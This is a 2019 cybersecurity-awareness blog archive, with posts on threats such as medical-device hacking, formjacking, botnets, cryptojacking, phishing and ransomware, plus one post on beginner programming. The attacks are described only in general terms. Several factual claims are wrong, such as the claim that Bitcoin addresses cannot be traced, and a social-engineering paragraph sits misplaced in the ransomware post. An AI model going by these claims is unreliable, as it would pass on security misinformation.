An example of an evil activity involving healthcare information is when a threat actor manages to steal PHIs about a patient and finds out that the patient has an electronic pacemaker attached to their heart and decides to kill or at least hurt the patient severely. The attacker can use customised software to send an electric shock to the patient wearing the pacemaker from 50 feet away. Another example of an incident involving Protected Health Information being leaked is when an attacker finds out that a patient has an insulin pump on their body. The attacker can use hacks that enable them to wirelessly communicate to the insulin pumps that use wireless communication channels and without even knowing any identification numbers send such signals or commands to the insulin pumps that makes the pumps inject higher or lower insulin than necessary into the patient's body. This could result in the patient into going into hypoglycemic shock.
Due diligence is highly necessary when securing PHIs because if appropriate security controls are not put in place at the right time then attacks like the ones discussed in the examples could occur and cause severe damages and there is a need to be ahead of the attackers so that attacks can be prevented before they actually happen, and the case should not be such that the healthcare organisations get to know that they have been hacked long after the event actually occurred and the effects felt by the victims.
A real-life example of a breach of healthcare information is the breach that occurred at UCLA Health. The breach caused 4.5 million patients' healthcare information to be compromised and has caused UCLA Health a $7.5 million loss. The officials claim that suspicious activity was detected in California health system's network, but the organisation was negligent in its efforts to put proper security controls in place. They got to know about it only after the systems were already hacked and healthcare information was compromised. Protecting healthcare information, hence, should be a very high priority issue.

Read More

28

March, 2019

Misconceptions In Programming

A beginner is always hard to start his programming career, collect the resources and get to know them. ...
In my career, people around me continue to ask many questions and doubts from time to time. This blog is a collection of the most popular questions for beginners.
I'm older, is it all right to begin?

The most common question I am asked is that I am at the end of my work, or I am older than all other programmers in the field. Can I get them and be a professional?
In programming and computers, there is no age factor. I'll say that I've met this one person at a hackathon, my real life experience. He was approximately 45 years old and at age 43 he began coding. He was a PHP developer.
The people were in groups at the hackathon but that person came alone. When the hackathon started, he continued to approach other groups and asked them about their projects.He asked if he could or could not help them.
You think or not, he was motivated at that age more than most youths who were there. Then he joined the team but they did not win. I saw him work for 2 days in a row even in the night. Therefore, if you believe your age is the problem then you are wrong because, when you've decided, nothing can stop you.
How can I afford I come from a lower class family?

The second major myth is that you must be rich in order to become a programmer. I laugh at them whenever someone says this.
Sometimes people even ask me to propose a good school for studying programming. You have plenty of free resources online. I also learned from them. Don't think that free money isn't as good as paid resources. The truth, however, is that most free resources are much better than those paid.
Some people even think that you need a powerful computer to code or run bigger issues. There are few resources like repl.it which allows you to learn and share your code online.
I accept that some high-end frames and applications need good computers, but that doesn't mean you're starting big. Take small steps and you who know you can earn and afford such a computer when you grow up at that level.
Money can certainly help you on your trip, but it never can fuel it. Go slower and try not to stop.
What language or technology should I start?
Nowadays, technology has grown to an unimaginable level. You can learn a million things. If there are many options, it's always hard to choose between them.
It doesn't depend on what technology or language you have chosen but on your dedication. Everything is useful in some way or another. Choose your career as desired and begin learning.
Should I be good at math, for being a programmer?
For this question, a big NO. If you're good at math, then your career is a mathematician, not a programmer.
Mathematics is useful only for a few times for advanced technologies. But, not all the time.
I saw a lot of programmers that aren't good at math but still growing.
I'm a college dropout, do I need a degree?
Programming is the only field in which the number of people who drop out is higher than the graduates of the college. Yes, that's true.
You need a degree for working somewhere else. But here, all you need in programming and computers. How many projects you have worked on and which technologies you know.
Tech companies want to hire people who are not just graduates but the people who know what they are doing and how to do it. A degree can never stop you to become a programmer but instead, it'll help you to give more time on it.
There's another story about a person who has finished primary school. He was so curious about computers that he didn't go to school. He had a slow Internet connection of 512 kbps and an old CPU with a monitor that was half visible. He borrowed a keyboard from a friend because he couldn't afford it.
After 6 years of fighting. Today, he owns two companies and one company identifies efficient programmers and helps them to be hired by top technology companies.
His hard work brought him out of all his fighting. This example may be sufficient to understand that a college degree is not required.
Conclusion:
Technology grows day after day. Don't wait and start now for the right time. Who knows you could be the next big engineer.
Never let your hustle and bustle cool down. Your hunger and fire let you fuel. Start today, you’re expecting a whole new world. A world in which you value your hard work instead of your money or college degree.

Read More

27

March, 2019

Authorisation

Ever tried opening a file and got an error saying you don't have the permission to access that particular file? ...
This is caused due to an access control mechanism called authorisation, and this blog discusses the process of authorisation, its usefulness and the risks of not implementing authorisation controls correctly. But, before delving deeper into the discussion, let us first differentiate between authentication and authorisation so that none of you gets yourself confused while reading through this blog.
Authentication is the process of verifying that an entity is what it says it is, or in other words, verifying the identity of an entity. For example, verifying a user's credentials when they try to login into their workstation computer connected to their organisation's local network. If the user uses genuine credentials, then they are authenticated and are logged in into the computer. On the other hand, authorisation is the process of verifying what an entity is allowed to do after they have been authenticated. For example, after the user has been logged in into their workstation and using their workstation they successfully connect and are authenticated to a particular server present on the network, they may or may not have access to specific files, folders or file systems. This access to particular resources is controlled by using authorisation controls. This is the difference between authentication and authorisation.
Authorisation occurs only after authentication, i.e. only after an entity, such as a user, is authenticated into a system will it be known what all that entity can do. Authorisation controls can be file system level based, be implemented by using numerous configuration options at the application level, role-based, or need to know based. Authorisation mechanism can also be established on the network-level to decide what all entities can access a particular part of a network and who all can not. Authorisation controls can be used to check whether any malicious activities are happening on the network as any violation of the access control mechanism would trigger an alert. This, however, depends on the implementation.
Attacks that can leverage the fact that an entity is authorised to do something or access something do exist. For example, let's say that Bob' account has access to a file server that holds sensitive files. An attacker has been scanning and enumerating Bob's company's network for days and has found that if they could compromise Bob's account, then they could get access to the company's sensitive data stored on the file server, and after figuring this out, they eventually manage to hack into Bob's workstation. They can now access those valuable files that are stored on the file server using Bob's account as his account has the proper authorisation to access those files. Therefore, in such type of attack, the adversaries were successfully able to exploit the fact that Bob's account was authorised to access the file server and the sensitive files that were stored on it.
Let's take the example of another type of attack that can occur on the network level. In this example, let's say Bob's company's network has implemented switches to segregate the multiple networks that exist in the company, and that the switch that Bob's workstation has been connected to has been configured to allow Bob's workstation to connect to the network of another office department. A threat actor could take advantage of this access right by performing an ARP poisoning attack on the network and spoofing the IP address of Bob's workstation. Now, as Bob's IP address is authorised to have access to the other department's network, the attackers can, hence, gain access to that part of the network as well. So, even if authorisation controls are good to have, and one should always implement them, attackers can still leverage that through attack vectors which allow the attacker to compromise the entity that has access rights to a resource.

Read More

26

March, 2019

Formjacking

Man- I just got a message to pay our credit card bill, and it is way too high! Did you use it to buy something?
Wife- What? No. I did not use the credit card.
Man- What? I'll have to check the credit card statement then. Wait. Oh my god! I see some transactions made to some electronics store! We have to report this to the credit card company! ...

This is a typical conversation you might come across whenever someone suffers when their credit card gets charged due to an unauthorised transaction. There are multiple ways in which credit card information can be stolen and used by adversaries. In this blog, we discuss a particular technique used by attackers that leverages web site forms to steal this information.
The technique that is being talked about is called formjacking, and it is a type of cyber-attack in which attackers inject malicious scripts into a web page, especially the one on which a user enters payment information while buying something online, to steal the data entered by the victim into the forms on that web page. Attackers mainly use this type of cyber-attack to steal payment information, such as the victim's credit card information. They then use that credit card information to make unauthorised transactions and buy things for themselves.
Many web applications exist in the world that include some kind of payment portal. People are starting to buy the things that they want from online shopping web sites. They buy things like groceries, clothes, shoes, electronics, etc. from numerous online web sites so that they don't have to go out physically and scope out the things they like. People think going out and buying things takes a lot of time, and instead, they might just stay at home and order certain products or services. Some even shop online when they are at their office so that they don't have to take the extra time to go out shopping and instead of that they could just go home and relax. People choose convenience wherever they can get it. It is the nature of humankind to select the options that make them feel comfortable. Attackers take advantage of the changing times and people shopping on the internet to gain financially. They use cyber-attacks like formjacking to loot people of their precious and hard earned money. This attack can be compared to the ATM card skimmers used by cyber-criminals on ATM machines to steal ATM card data. However, the thing that makes formjacking even scarier is the fact that the users have no way of finding out whether the payment web page is rigged by the attackers and a malicious script has been injected into the web page.
In the year 2018, threat actors managed to use malicious JavaScript code to steal victim's payment information, such as credit and debit card information, off of numerous eCommerce web sites. The number of cases and the rate at which formjacking attacks were rising that year made formjacking get ahead of clickjacking and even ransomware attacks. There were around 4,800 formjacking attacks reported per month in 2018 which has caused many companies to rethink about the design of their web applications. Companies blocked approximately 3.7 million formjacking attacks, one-third of which occurred during the holiday shopping season in the same year.
The usual victims of formjacking attacks are small and medium-sized firms, but that does not leave big companies out of the risk. Some big companies can also be targeted by such attacks. Examples of such big companies who fell prey to attackers who were using formjacking attacks to steal payment information are Ticketmaster and British Airways. In the Ticketmaster breach, around 40,000 of their customers in the UK were affected. The attackers managed to compromise the chatbot of one of their partner's website and went on from there to inject malicious JavaScript into Ticketmaster's web site, which allowed them to steal victims' information. The attackers used a similar method along with setting up fake web domains and servers to orchestrate an attack that affected 380,000 customers.
This is a type of attack from which everyone should try to keep themselves safe as is it very hard to detect.

Read More

25

March, 2019

Privacy and Anonymity

In today's world, where cybercrimes are happening everywhere, and important and private data is being stolen by cyber criminals it has become necessary to hide one's personal information. ... In this blog, we discuss how important privacy and anonymity have become in modern times, whether it be online or offline.
Privacy is the right of expressing or letting known only a specific piece of information about someone to an entity whom the person sharing the information chooses selectively. In other words, the person sharing the information has the right to only share what they wish to share, and they may decide with whom they want to share that information. The concept of privacy can be both online as well as offline. In offline privacy, a person has the right to control what all information is collected about them while interacting with others, providing their personal documents to someone physically, or when they are doing some other private things. They also have the right to control how all their information is used. Same is the case with people's online privacy. The difference here is that all the information that is being handled is digital. Online privacy pertains to all the information collected and used via online means, such as information collected by social media websites. Privacy should be taken very seriously because if an attacker manages to steal a victim's private information, then they could use it for their personal gains. For example, if a threat actor somehow steals a victim’s private photos which if shared elsewhere could cause embarrassment for the victim, then the attacker could use that opportunity to blackmail the victim for financial gains. Even your Internet Service Provider (ISP) may collect and sell your data to, for example, an advertising company, who may then invade your privacy by spamming you with advertisements.
When it comes to anonymity, then the matter is concerned with the identity of a person. Anonymity means hiding one's identity while interacting with another entity. For example, while sending messages online, one could create a profile with a fake name or no name at all. This comes in handy, especially when surfing websites on which there might be someone watching or trying to gather information about others. If the user is anonymous on the site, then the attacker's chances of identifying a victim are reduced by a considerable margin, and if the attacker is not able to identify the victim even if they have stolen some information, then it might be of no use to them. For example, if an attacker intercepts a private message that contains a password and if there is no identifying information in that message or regarding the sender or the receiver, then the attacker might not have any use of that password. The attacker won't know what to do with that password. Hence, remaining anonymous online has become a useful concept while surfing the internet nowadays as adversaries lurk around in search of a victim's personal information.
When talking about both privacy and anonymity together, some might get confused, but privacy is concerned with the content, such as the contents of a message, whereas, anonymity is related to the identity of a user, such as the sender of the message.
Like the way there are two faces of a coin, there is an inevitable dark side to privacy and anonymity. Just like regular users have the right of being private, so do the attackers. They also use techniques to be private and anonymous on the web and offline. This can cause trouble for victims if they fall prey to these criminals. Let's take an example of chat rooms that allow people to talk to each other anonymously and make new friends. Numerous people use them, and if there is an adversary who is also using that service, then they could try and lure people into giving away private information by talking to the victim via the chat room. The attackers us e clever techniques to steal information, and by the time the victim realises what had happened, the attacker would be long gone, and the victim won't even get to know with whom they were talking to. So, be careful with what you share and where you introduce yourselves. Attachments area

Read More

23

March, 2019

Authentication

Access Granted! Access Granted! ... You wouldn't want that alert to pop-up when a threat actor is trying to access your facilities, network or systems. This blog discusses the ways authentication methods can be used to prevent adversaries from gaining access to critical infrastructure and sensitive information.
Authentication is a way of making sure that any given entity is actually who they say they are. For example, it is a way of making sure whether it is really Alice who is checking-in to a flight by validating his identification documents. Another example of this is making sure that it is actually Bob who is signing in to his workstation or not by confirming his credentials. There are multiple different methods of authentication that can be used to verify and authenticate an entity. In one form of authentication a credible person, first verifies whether an entity is genuine and if it is genuine then that proof of the entity's genuineness can be accepted by others to authenticate that particular entity. Examples of such verification processes are the key-signing parties that are held regularly among the GNU Privacy Guard and PGP communities, where people sign each other's public keys. In another form of an authentication process, whether someone would be granted access to certain entities depends on the documentation or other external confirmations. For example, if a user uses credentials to access secure systems and those credentials are authentic, it is only then that they will be granted access to those systems. Authentication can be used for many purposes, which include authenticating to one's workstation, a web site account, Wi-Fi access point, bank account, an ATM machine, etc. Several factors of authentication exist that can be used for these purposes.
The most widely used authentication factors are something you know, something you have, something you are, somewhere you are and something you do. In the first type of authentication factor, the user memorises a password or a PIN number that they can enter whenever asked for. Using a simple password or PIN is not a good idea as they can be easily cracked using simple techniques, such as guessing. It is, therefore, recommended to use complex passwords. In the second type of authentication factor, the user posses something tangible, for example, a smart card, to authenticate themselves into a secure facility or systems. The smart cards can, however, be stolen or lost and this could cause trouble for the victim as they might lose their access to critical systems, or if an attacker has their smart card, they can impersonate the victim and perform malicious activities under their identity. The third type of authentication deals with the physical characteristics of the user's body, such as fingerprints, to authenticate the user. This factor is tough for an attacker to copy and impersonate the user as it is hard for someone to steal someone's body parts or make a copy of them. In the fourth factor, authentication depends on the geographical location that a user is at. If they are at a place where they did not authenticate from before, then the system they are trying to access may reject their request to authenticate. This also means that if an attacker attempts to gain access to someone's account from a location that is far away from the legitimate user's usual sign in place, then the attacker may get blocked from accessing the user's account. The fifth factor deals with the way a user performs an action. It could be either the way they type on a keyboard, perform gestures, or their touch patterns. In general, if only one of these factors is used, it called single-factor authentication, if two factors are used then it is called two-factor authentication, and when more than two factors are used in conjunction with each other, then that type of authentication is referred to as multi-factor authentication.
An example of an authentication attack is a brute force attack, in which a threat actor uses computing power to attack the "something you know" factor and guess a user's password, username, a cryptographic key, or credit card numbers. This type of attack is an automated trial and error process that tries to authenticate to a system by inputting a specific value and then checking whether it works or not. If it works then, the attacker may gain access to the system, and if that value is incorrect, then the attacker uses the next value. This is performed using automated tools, which makes it an easy process for the attacker. This is extremely true if the user has used weak credentials. Single factor authentication has been proven to be insecure as attackers are getting cleverer each day. Therefore, authentication methods should be chosen wisely.

Read More

22

March, 2019

Encryption in current threat landscape

This world is full of things that are either good or bad for us. There also exist things that could be good and bad, good for one while bad for someone else. ... This blog discusses how encryption could have advantages as well as disadvantages in the current threat environment.
Encryption is a cryptographic process that converts text that is in a human-readable form to a format that is impossible for humans to understand without the use of specific cryptanalysis techniques. Encryption has been around from ancient times. Caesar cipher is an ancient encryption technique which is very simple and is used widely. It is based on the substitution encryption technique in which a particular letter is replaced by another letter that is a fixed number of letters away from it in the English alphabet. A substitution cipher is easy to crack, and so is the Caesar cipher. Encryption techniques were created by ancient people because they wanted to keep the messages that they sent to someone a secret.
Mainly, there are two types of encryption methods, symmetric encryption and asymmetric encryption. In symmetric encryption or private-key encryption, there is a single key that is used for both encrypting and decrypting a message and is called a secret key, which is why symmetric encryption is also sometimes referred to as secret-key encryption. In this type of encryption, before sending a message, the sender uses a symmetric encryption algorithm and a secret-key to convert the plaintext message into an unintelligible ciphertext and then sends the ciphertext to the receiver. The sender and the receiver share the secret-key, and then the receiver goes ahead and uses that secret-key to convert the ciphertext back into a human-readable plaintext message. In asymmetric encryption or public-key encryption, the sender and receiver decide upon a pair of keys which includes a public-key and a private-key. The person who wants to send a message uses the receiver's public-key to encrypt the plaintext before sending the message. After receiving the ciphertext message, the receiver uses their own private-key to decrypt the ciphertext message. In general, whoever wants to send an encrypted message has to have the public-key of the receiver, and the receiver should have access to their own private-key.
Keeping the keys private and protected is a crucial task when using encryption because if any of the keys is lost, then a lot of damage can be caused. This can happen if an attacker manages to access the lost keys and eventually gain access to the confidential data. Losses can also occur if an organisation encrypts their data, loses the decryption keys and has kept no backups because then the encrypted data may get lost forever as it won't get decrypted without the decryption keys and this may cause considerable losses to the organisation.
There is one more way in which encryption can be used, and that is hashing. Hashing is a form of one-way encryption in which a hashing algorithm is applied to a piece of data to generate a character string, which is called a hash value or simply a hash. This hash value can be used for integrity verification of data and remains unchanged if the data is not changed from its original form. Even if a single bit of data changes, the hash value changes as well. Therefore, it is considered that no two data entities can have the same hashes. However, exceptions exist where two hashes have been found to have the same value. Multiple different hashing algorithms exist which can generate hashes of varying complexities and lengths. Encryption can be performed on data at rest and data in transit.
Organisations use encryption to keep their data confidential and safe from snooping eyes. They apply solutions to protect data at rest, such as full-disk encryption software, that encrypts the hard drives of all the systems that hold sensitive information. Solutions such as using encrypted communications channels protect data in transit. An example of this is the SSL or TLS tunnel that is implemented onto the client-server communications channels that are created between a web server and a user's web browser for exchanging information. Encryption can also be used to encrypt people's emails. While these are some of the good ways that encryption is used, there are, however, some evil ways that it is being used as well. One significant example of an evil way that encryption is used is encryption malware, such as ransomware. Threat actors use ransomware to encrypt victims' hard drives, files, folders, etc. They use this technique to attack both the desktop and mobile platforms. There have been cases where ransomware attacks have caused organisations to suffer millions of dollars in losses. One example is the NotPetya ransomware attack that was faced by Merck. NotPetya cost Merck about $135 million in sales and $175 million in other costs.
Hence, encryption can be used for both legal and illegal purposes. People created encryption and use it to keep information confidential, but attackers use it to encrypt people's data and cause them trouble.

Read More

20

March, 2019

Herding bots into botnets

Ever met someone who was wondering how they used up so much of their internet data or been in such a situation yourself? ...? The reason behind this might not be the usual "a lot of surfing and downloading caused it", but it could be something that you might not even have any idea about. It could be that your device has become a part of a botnet, about which we will discuss in this blog.
You might be wondering what a botnet is. Well, in simple words, a botnet is a network of bots that is created to perform a specific task repetitively. It is also sometimes referred to as a zombie network. Bots are devices, such as a computer, a mobile device, an IoT device, or any other type of device that can connect to the Internet. Botnets can be used for legal or illegal purposes. Legal purposes can include things like performing tasks that help to keep a website running. This type of botnet is not a cause of danger to society. The botnets that everyone should be afraid of are the ones that the attackers create to perform illegal activities. Threat actors compromise devices by using malware and add those compromised devices to their evil botnet. They grow their botnet by compromising more and more devices using the botnet itself until they have gathered enough bots to perform the actual attack for which they were creating the botnet for initially. The attackers compromise the systems via a drive-by download or tricking a victim into installing malware, called a Trojan horse, onto their computers. After the malware gets installed, the newly created bot connects back to the computer that acts as the controller of the botnet and the controlling computer lets the attacker's computer know that the bot is online and ready to follow the instructions given to it, and in this way the compromised device comes under full control of the botnet owner. This is how the botnet is created and grown in size.
There are mainly two different types of botnet architectures, a client-server model and a peer-to-peer botnet. The client-server model is the one we discussed above, in which there is a central server controlling the bots that are connected to it. The botnet owner sends the commands to the botnet server, also referred to as the command and control server (C&C server), which forwards those commands to the bots, and the bots then perform the tasks that the botnet owner wants them to perform. In a peer-to-peer network type of botnet, the botnet owners spread malware on peer-to-peer networks to create and gather bots for the botnet. Such peer-to-peer botnets use digital signatures, and only the person who has the private key can access and control the botnet. The key pairs are generated using public-key cryptography.
The botnet owner uses the botnet to perform evil tasks, such as a distributed-denial-of-service (DDoS) attack on websites any other targets, sending out spam emails and creating fake internet traffic on a site for financial gains. The attackers can also replace the ads in the victims’ web browsers and generating pop-up ads that try to fool victims into paying for the removal of the botnet from the computers. There are more purposes that adversaries use botnets for, and they are:

For sniffing network traffic of millions of users around the globe

Logging keyboard keystrokes or keylogging

Can be used to spread new malware, such as ransomware

To attack Internet Relay Chat networks

To manipulate online polls

To manipulate online games

Performing mass identity theft
The botnet owners may also rent out the botnet that they have created to other cybercriminals, or straight up sell the whole botnet to them. The buyer then uses the botnet for their own nefarious purposes.
Botnets can be a considerable problem for critical infrastructure as it can cause significant or permanent damage to the systems present in the environment. This can happen if the attacker sends a large amount of traffic that the systems can't handle and get heated up due to the intensive use of their resources. A notable example of a very problematic botnet is the Mirai botnet. It is still causing chaos out in the wild and was recently upgraded with more exploits than it originally included in its arsenal. It mainly targets IoT devices, such as routers, digital video recorders, smart TVs, and IP cameras. Mirai's first occurrence was in August 2016 and was created by a group of three men who were punished by the court for the damage caused by their malware. These men were even questioned by the FBI for their actions. Threat actors used Mirai botnet to hit the KrebsOnSecurity web site with a massive denial-of-service attack. The attack was reported to have been used thousands of devices and was the cause of the web site being down for several days. Hence, protect your computers from becoming zombies and bots as they could become a part of a massive botnet performing malicious activities and could get you into trouble because your device would probably be connecting to the target using your IP address, which can be tracked by law enforcement agencies, and they might think that you are the culprit behind all the chaos and catch you instead.

Read More

19

March, 2019

Cryptojacking and its effects on computing equipment

Ever wondered why your laptop is getting hot and kind of burning your lap? No? Well, you might just want to think over it and find the reason why as it may not only be a hardware issue.
...In this blog, we will discuss about a process which attackers use to mine cryptocurrencies by using the resources of the user's PC illegitimately without the user even getting to know about it.
The process we are talking about is called Cryptojacking, and threat actors use various techniques to put this process into play and mine cryptocurrencies. It is also possible that the entities mining cryptocurrencies illegitimately are not actual adversaries, but one of the websites the user visits regularly. Even these websites could use the resources of the user's computer and mine cryptocurrencies for themselves. Cryptojacking can be done either by installing a program on the victim's computer or just through the web browser without installing any other program, which is even worse. Crytojacking uses up the Central Processing Unit (CPU) of the victim's computer, slows the system down, and degrades its performance. It even reduces the battery life of the machine. In some cases, the storage space on the computer has also been seen to get used up.
The in-browser crypto jacking works by using or injecting JavaScript onto a web page to mine for cryptocurrencies. The attackers leverage the fact that JavaScript code does not need to be installed and that it runs on just about every website that exists in the world to mine cryptocurrencies off of the victim's computer. The victim does not need to install the code, execute it by themselves, or even opt-in to running JavaScript code on their computer. It simply runs on its own. This is very scary as the victim is not even in control of what is happening on their computer. Monero is a cryptocurrency that supports in-browser crypto jacking. Coinhive is a crypto mining service that attackers had been using for their crypto jacking endeavours. It has been shut down now, but when it was operational it was reported as making about $250,000 per month mining Monero at one point in time, and among all the websites that were running a cryptocurrency miner, Coinhive had a 62% share. This type of crypto jacking is not just limited to the desktop platform, it can also infect Android mobile devices. There was a 4000% rise in Android-based crypto jacking attacks.
The second approach the adversaries take to perform crypto jacking is installing a crypto mining malware onto the victim's computer. They use multiple techniques to make this happen, but the most widely used one is through a social engineering attack called phishing. The adversaries use this social engineering attack to lure the victim into clicking a malicious link sent to the victim through a phishing email and accidentally installing the crypto mining malware onto their computers. After getting installed on the victim’s computer, the crypto mining malware starts running in the background and keeps on running and mining cryptocurrency without the victim even knowing about it. For as long as the victim's computer is kept turned on the crypto mining malware keeps mining cryptocurrencies while using up the precious resources of the victim's computer. It is difficult to detect the infection after the fact, and it is also difficult to detect why the computer's CPU has such a high utilisation. This is because the processes running on the system can be hidden or be masked as legitimate processes.
Cryptojacking is a cause of concern as it can also become the reason for significant physical damages to an organisation’s electrical infrastructure. This is because it can cause extreme overheating of the computing hardware owned by the victim's. All this extra usage of the computing hardware have been reported to cost organisations electricity bills of over $2,196 per year. Therefore, it is a wise choice to protect yourself against crypto jacking and be on the lookout for any suspicious activities happening on the systems that you or your company are using.

Read More

18

March, 2019

Social Engineering- Hacking Human Vulnerabilities

(Tring) (Tring)
Receiver: Hello. Who is this?
Caller: Hi, I am calling from Microsoft. We just got a diagnostics report from your personal computer, and I wanted to tell you that your computer has a virus!
...Receiver: Oh God! No wonder it was working so slow since the past few days..... And there we have yet another victim of another cyber-attack called a Social Engineering attack. Humans have a lot of vulnerabilities that can be exploited by using various social engineering techniques. This blog discusses what social engineering is and what are the different social engineering techniques that threat actors use to exploit human vulnerabilities.
Humans are a social animal, and they have the tendency to get happy when they talk to someone who is willing to help them, and they start trusting that person, who was a stranger two seconds ago, with even their private information. In a Social engineering attack, threat actors cleverly exploit these human vulnerabilities of emotions and trust and fool the victims into giving away sensitive information without the use of any malware. Mostly, these attacks are widespread, but many a time they can be highly targeted. There are many different forms of social engineering attacks, such as phishing, vishing, smishing or SMS phishing, tailgating, baiting, and pretexting.
Phishing is a type of social engineering attack in which a threat actor tries to manipulate the victim into acting hastily by incorporating fear, sense of urgency and threats. Attackers use URL link shorteners to redirect victims to websites that might look legitimate but are in reality, malicious. They also try to redirect users to a malicious site by embedding links in other websites or legitimate-looking emails that they send to people's inboxes to steal personal information, such as user's login credentials. Scammers using phishing emails as an attack vector craft email messages that look like coming from a genuine person or organisation and informing the user about a security or other incident that had taken place and that the user's account is in danger, and in order to secure their account they need to go to the URL given in the email and reset their password. Taking the example of an organisation, say a bank, when the user clicks on that link, a website opens looking exactly like the login screen of the bank's website, and as soon as the unsuspecting user enters their credentials into the username and password fields, and clicks on the login button, their credentials get stolen and transmitted to the attacker. The user usually does not come to know about it because after clicking on the login button the user is again redirected to the bank's genuine website, so they are fooled into thinking that it might have been an error and that's why they were brought back to the login page again. This is how attackers trick unsuspecting users into giving away their personal information.
Vishing is a type of phishing attack in which attackers use voice calling to lure victim's into giving away their personal information, such as credit card information. An attacker could call the victim's by posing as being someone from the victim's bank and telling them that the bank detected some suspicious activities on the victim's credit or debit card account and that the victim should change the PIN number for the card they are using over the phone if they wanted to secure their account, which induces fear in the victim and urges them to follow the attacker's instructions and change the PIN number. The attackers ask the victim to tell them the all the card details so that they can go ahead and reset the PIN, and as soon as the victim provides them with their card details, the attackers make unauthorised transactions using the victim's card while still being on the phone with the victim. The victim has no clue of what just happened to them even after the attacker hangs up the phone, and gets to know that they were a victim of a vishing attack only after the victim checks their account details the next time. Smishing or SMS phishing is another type of phishing attack in which the attacker uses SMS messages to orchestrate a social engineering attack.
Tailgating is another social engineering attack in which an unauthorised attacker gains access into a target building by following or shadowing a person who is authorised to enter the building. They do so by posing as someone from the maintenance department or a delivery person, etc. and may ask any authorised person to hold the door for them so that they can enter easily. There is another type of social engineering attack called baiting in which an attacker lures the victim into giving away their personal information in exchange of some goods, such as a free mp3 song or a free movie to download. Pretexting is another social engineering attack in which the attacker creates a fake story to steal a victim's personal information. For example, an attacker could act as being from another branch office of the organisation and fool the security personnel into letting them into the building, and after entering the building, they could social engineer other personnel and steal sensitive information, manipulate the company's systems or cause any other damage.

Read More

16

March, 2019

Ransomware causing chaos

(Click) (Click)..Hmm.(Click) (Click) (Dialog box opens) “Ur fil3s h@v3 b33n 3ncrypt3d! U h@v3 2 d@y$ t0 p@y u$ m0n3y 0r $@y G00DBY3 t0 ur fil3s f0r3v3r!”
... Adversaries come up with more and more complex attack techniques each day, and using malware is one of them. Malware is malicious software that is coded to perform sinful activities on a computer system present in an organisations network infrastructure. In this blog, we will be discussing a particular type of malware, called ransomware, and how it managed to penetrate one of UK's most critical organisation, the National Health Services network and cause chaos.
Ransomware is a malicious software that prevents a user from accessing the files and folders that they have stored on their computers, and sometimes the whole machine itself. It does so by encrypting the files and folders present on the system or the master boot record of the hard drive. Ransomware then asks the users to pay money to its perpetrators, mostly via Bitcoins, if the users want back the access to any of the locked files, folders or the locked computer. Depending on the strain of the ransomware used the malware pops-up a dialogue box providing a deadline for the payment, a Bitcoin wallet address, and a scary message to scare the victims and luring them to pay the money, worrying that they might lose all their valuable data. However, it is not necessary that even if the victims send the money to the threat actors, their data would be decrypted, and if it the data does not get decrypted, it would cause even greater monetary loss. Therefore, it is always a risk even in paying the ransom money to the perps. They use Bitcoin as the Bitcoin addresses cannot be tracked by law enforcement agencies so it would be easier for the criminals to cover their tracks and escape from being caught. In this type of attack, the adversaries are trying to mimic the real-world situation of taking hostages and asking for ransom through using the ransomware crimeware. The files become the hostages as they get encrypted without the victims having the decryption keys to decrypt the data.
If the attack was on a company and they don't have a backup of their data, then the company gets in a dilemma of choosing whether or not to go ahead and pay the ransom so that the attackers could send them the decryption key or decrypt their data for them. These attacks can be tremendously destructive. Ransomware has been considered as the most dangerous cyber threat in the world. There are multiple types of ransomware strains present in the wild. Some of the main categories of these ransomware strains are Encryption ransomware, Lock Screen Ransomware, Master Boot Record (MBR) Ransomware, Ransomware encrypting web servers and Mobile device ransomware.
Encryption ransomware is a type of ransomware that uses advanced encryption to encrypt the files and folders and gives a pop-up dialogue box asking to pay ransom if the users wanted to gain access to their files ever again. An example of this type of ransomware is CryptoLocker. Lock Screen Ransomware does not encrypt anything, but instead, it prevents access to the computer by displaying a full-screen message on the screen that cannot be closed and prevents the user from accessing doing anything on their computers. It asks for ransom from the user if they want access to their machines. An example of this type of ransomware is WinLocker. Master Boot Record (MBR) Ransomware is a type of ransomware that alters the Master Boot Record (MBR) of the hard drive present on the computer, which is used by the computer for booting up and loading the operating system, and hence, makes the system unbootable. When the user tries to turn on the machine, it displays a message on the screen demanding a ransom. An example is the Petya ransomware which modifies the MBR and encrypts the Master File Table (MFT) on the computer's hard drive. Ransomware encrypting web servers exploits the known vulnerabilities in the web servers to get into the servers and encrypts the files stored on the web server. It is a highly targeted malware. An example of such ransomware is Linux.Encoder.1 that targets web servers based on the Linux OS. It uses a robust encryption algorithm to encrypt files that have particular extensions, and are present in specific directories. Mobile device ransomware is a kind of ransomware that is used by attackers to mostly attack mobile devices running the Android OS. It is similar in the way encryption ransomware perform its activities, the only difference being that it performs its malicious operations on a mobile device. One example of this type of ransomware strain is Pletor. It mainly infects the devices that have been used to visit bogus porn sites by acting as a media player and encrypting files with specific extensions and then asking for a ransom to unlock the data. It displays messages in Russian language and has more than 30 different versions.
One of the most notable ransomware attacks in the world was the one that targeted the National Health Services (NHS), which is the world's largest single-payer healthcare system. The ransomware attack affected 61 NHS organisations across the United Kingdom (UK) and disrupted GP and hospital appointments. The organisations were not able to access patient records, ambulances were diverted, and many surgeries were interrupted as well. People were advised to take precautions and use NHS services with care. The ransomware strain used was Wanna Decryptor, and the cyber-criminals asked for ransom money in Bitcoins. Many medical centre's jobs were made highly impossible to do by the ransomware. The results of such an attack are felt the hardest by the patients using these medical services as it just adds to the suffering that they are already undergoing. It could be even worse if the patient records get fully compromised as doctors won't be able to access critical life-saving information about the patients, such as allergies, ongoing medications, etc. So, measures should be taken to try and protect the network and its systems against this barbaric malware. Using backups is a great precautionary measure.
One of the most damaging social engineering attacks was suffered by Ubiquiti Networks in the year 2015 when some attackers sent some phishing emails to the accounting department of the company. The emails purported to be from a subsidiary of the company and contained instructions about various payments to be changed and payments to be made to multiple overseas accounts which the employees thought of actually belonging to legitimate entities whom the company was dealing with. The employees blindly followed those instructions without confirming or verifying whether those emails actually did come from the company's subsidiary. The employees thought that the money went to genuine entities, but in reality, it went to the attackers accounts, and this caused the threat actors to steal $47 million from the company, of which only $8 million were ever recovered.
Social engineering attacks are a cause of a massive number of security breaches around the globe. Therefore, people should try to protect themselves against such attacks to all the extents they can.

Read More

15

March, 2019

Polymorphism and evading an IDS and IPS

Alert! It's a virus. Alert! It's a trojan! Oh no! It looks like our IDS is busted, this malware got into our network somehow, but how?! There exist various techniques that threat actors can use to fool an organisation's security controls and compromise its network infrastructure. One of these techniques is using polymorphism to evade the Intrusion Detection Systems set up by a company to detect malicious activity on the organisation's network.... This blog post is all about how the use of polymorphism is snowballing among adversaries and the way this technique is used to inject malware into the target company's network without the malware being detected.
